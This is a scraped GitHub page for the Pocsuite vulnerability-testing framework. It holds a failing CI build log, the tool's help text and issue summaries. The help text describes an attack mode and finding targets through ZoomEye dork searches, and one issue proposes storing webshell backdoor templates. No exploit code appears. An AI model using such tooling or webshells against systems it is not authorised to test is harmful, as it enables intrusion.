  Downloading pyflakes-1.2.3-py2.py3-none-any.whl (209kB)
    100% |################################| 212kB 2.0MB/s 
Collecting mccabe<0.6.0,>=0.5.0 (from flake8)
  Downloading mccabe-0.5.2-py2.py3-none-any.whl
Collecting enum34 (from flake8)
  Downloading enum34-1.1.6-py2-none-any.whl
Collecting pycodestyle<2.1.0,>=2.0.0 (from flake8)
  Downloading pycodestyle-2.0.0-py2.py3-none-any.whl (42kB)
    100% |################################| 45kB 5.2MB/s 
Collecting configparser (from flake8)
  Downloading configparser-3.5.0.tar.gz
    /tmp/pip-build-wUzH1r/configparser/setup.py:12: DeprecationWarning: Parameters to load are deprecated.  Call .resolve and .require separately.
      import sys
Collecting ordereddict (from configparser->flake8)
  Downloading ordereddict-1.1.tar.gz
    /tmp/pip-build-wUzH1r/ordereddict/setup.py:12: DeprecationWarning: Parameters to load are deprecated.  Call .resolve and .require separately.
Installing collected packages: ordereddict, configparser, pycodestyle, enum34, mccabe, pyflakes, flake8
  Running setup.py install for ordereddict
    /home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/setuptools/command/egg_info.py:171: DeprecationWarning: Parameters to load are deprecated.  Call .resolve and .require separately.
      writer = ep.load(installer=installer)
  Running setup.py install for configparser
    /home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/setuptools/command/egg_info.py:171: DeprecationWarning: Parameters to load are deprecated.  Call .resolve and .require separately.
      writer = ep.load(installer=installer)
    Skipping installation of /home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/backports/__init__.py (namespace package)
    Installing /home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/configparser-3.5.0-py2.6-nspkg.pth
Successfully installed configparser-3.5.0 enum34-1.1.6 flake8-3.0.4 mccabe-0.5.2 ordereddict-1.1 pycodestyle-2.0.0 pyflakes-1.2.3
install.2
0.65s$ pip install pydocstyle
Collecting pydocstyle
  Downloading pydocstyle-1.0.0-py2.py3-none-any.whl
Installing collected packages: pydocstyle
Successfully installed pydocstyle-1.0.0
0.10s$ python -c "from pocsuite.api.cannon import Cannon; import pocsuite"
The command "python -c "from pocsuite.api.cannon import Cannon; import pocsuite"" exited with 0.
0.33s$ python pocsuite.py --help
usage: pocsuite [options]
optional arguments:
  -h, --help            Show help message and exit
  --version             Show program's version number and exit
target:
  -u URL, --url URL     Target URL (e.g. "http://www.targetsite.com/")
  -f URLFILE, --file URLFILE
                        Scan multiple targets given in a textual file
  -r POCFILE            Load POC from a file (e.g. "_0001_cms_sql_inj.py") or directory (e.g. "modules/")
mode:
  --verify              Run poc with verify mode
  --attack              Run poc with attack mode
request:
  --cookie COOKIE       HTTP Cookie header value
  --referer REFERER     HTTP Referer header value
  --user-agent AGENT    HTTP User-Agent header value
  --random-agent        Use randomly selected HTTP User-Agent header value
  --proxy PROXY         Use a proxy to connect to the target URL
  --proxy-cred PROXYCRED
                        Proxy authentication credentials (name:password)
  --timeout TIMEOUT     Seconds to wait before timeout connection (default 30)
  --retry RETRY         Time out retrials times.
  --delay DELAY         Delay between two request of one thread
  --headers HEADERS     Extra headers (e.g. "key1: value1\nkey2: value2")
  --host HOST           Host in HTTP headers.
params:
  --extra-params EXTRA_PARAMS
                        Extra params (e.g. "{username: '***', password: '***'}")
optimization:
  --threads THREADS     Max number of concurrent HTTP(s) requests (default 1)
  --report REPORT       Save a html report to file (e.g. "./report.html")
  --batch BATCH         Automatically choose defaut choice without asking.
  --requires            Check install_requires
  --quiet               Activate quiet mode, working without logger.
  --requires-freeze     Check install_requires after register.
Zoomeye or Seebug:
  --dork DORK           Zoomeye dork used for search.
  --max-page MAX_PAGE   Max page used in ZoomEye API(10 targets/Page).
  --search-type SEARCH_TYPE
                        search type used in ZoomEye API, web or host
  --vul-keyword VULKEYWORD
                        Seebug keyword used for search.
The command "python pocsuite.py --help" exited with 0.
0.32s$ flake8 . --max-line-length=120 --exclude pocsuite/thirdparty --ignore F401,N802,N803,N806,E501,N813,N801,N812
/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/options/config.py:56: DeprecationWarning: You passed a bytestring as `filenames`. This will not work on Python 3. Use `cp.read_file()` or switch to using Unicode strings across the board.
  found_files = config.read(files)
Traceback (most recent call last):
  File "/home/travis/virtualenv/python2.6.9/bin/flake8", line 11, in <module>
    sys.exit(main())
  File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/main/cli.py", line 16, in main
    app.run(argv)
  File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/main/application.py", line 316, in run
    self._run(argv)
  File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/main/application.py", line 300, in _run
    self.run_checks()
  File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/main/application.py", line 237, in run_checks
    self.file_checker_manager.start(files)
  File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/checker.py", line 364, in start
    self.make_checkers(paths)
  File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/checker.py", line 272, in make_checkers
    checks = self.checks.to_dictionary()
  File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/plugins/manager.py", line 450, in to_dictionary
    plugin.to_dictionary() for plugin in self.ast_plugins
  File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/plugins/manager.py", line 488, in ast_plugins
    plugins = list(self.checks_expecting('tree'))
  File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/plugins/manager.py", line 443, in checks_expecting
    if argument_name == plugin.parameter_names[0]:
  File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/plugins/manager.py", line 95, in parameter_names
    self._parameter_names = list(self.parameters)
  File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/plugins/manager.py", line 88, in parameters
    self._parameters = utils.parameters_for(self)
  File "/home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages/flake8/utils.py", line 297, in parameters_for
    parameters = collections.OrderedDict([
AttributeError: 'module' object has no attribute 'OrderedDict'
The command "flake8 . --max-line-length=120 --exclude pocsuite/thirdparty --ignore F401,N802,N803,N806,E501,N813,N801,N812" exited with 1.
Done. Your build exited with 1.

使用pyc的poc出现register failed "No module named net"

原因

lib/controller/setpoc.py中，只对py文件做了multipleReplace()处理，而pyc由于文件格式原因并未做处理。

建议

重新修改poc编写方式的说明文件和用例
增加对pyc文件导入的错误处理或提示

1.0.0dev 文档

框架调用Attack前自动调用Verify功能

考虑到降低 Attack 方法的误报率，在 Attack 前先调用 Verify，验证存在漏洞后再进行 Attack 逻辑。

好处是误报率大大降低,并且降低 Attack 逻辑编写难度
缺点是会增加一倍的时间成本。

现在问题来了，要不要框架自动调用 Verify?

有关“-u”参数的一个小问题

对于经由“-u”传入的地址，如开头不是“http://”或“https://”或没指定协议，便会在地址开头添加“http://”，在使用ssh，ftp等协议时造成了一些不便（需要在poc内重新处理地址）。
修复建议的话是检测poc中是否import了urllib，requests等包。若没引入，则默认程序编写者已意识到地址处理的问题且不处理地址。

remove (pocsuite.api.webshell and pocsuite.lib.utils.webshell)

If possible, webshells should be in a directory, ex:

/path/to/pocsuite/data/backdoors/asp.txt
/path/to/pocsuite/data/backdoors/aspx.txt
/path/to/pocsuite/data/backdoors/php.txt
/path/to/pocsuite/data/backdoors/jsp.txt
....

If you want to generate webshell flags, please redirect to How to random a string or a number

设置多线程时扫描不出来漏洞，单线程还是可以的

OS / Software Version

Please copy uname -a result here
Pocsuite version here

knownsec / pocsuite Goto Github PK

pocsuite's Introduction

This project has stopped to maintenance, please to https://github.com/knownsec/pocsuite3 project.

Pocsuite

Overview

How to use

Pocsuite with seebug PoC search and zoomeye dork

Pocsuite with seebug PoC and zoomeye dork

Pocsuite with zoomeye API

Pocsuite with seebug PoC API online

Requirements

Installation

Documentation

How to Contribute

Links

pocsuite's People

Contributors

Stargazers

Watchers

Forkers

pocsuite's Issues

coding: utf-8

OS / Software Version

How to reproduce the issue ?

url2ip解析可能导致ssrf

可能有问题的插件写法

OS / Software Version

How to reproduce the issue ?

OS / Software Version

How to reproduce the issue ?

[06:01:08] [-] ZoomEye API authorization failed, make sure correct credentials provided in "~/.pocsuiterc".

使用pyc的poc出现register failed "No module named net"

原因

建议

OS / Software Version

How to reproduce the issue ?

Recommend Projects

Recommend Topics

Recommend Org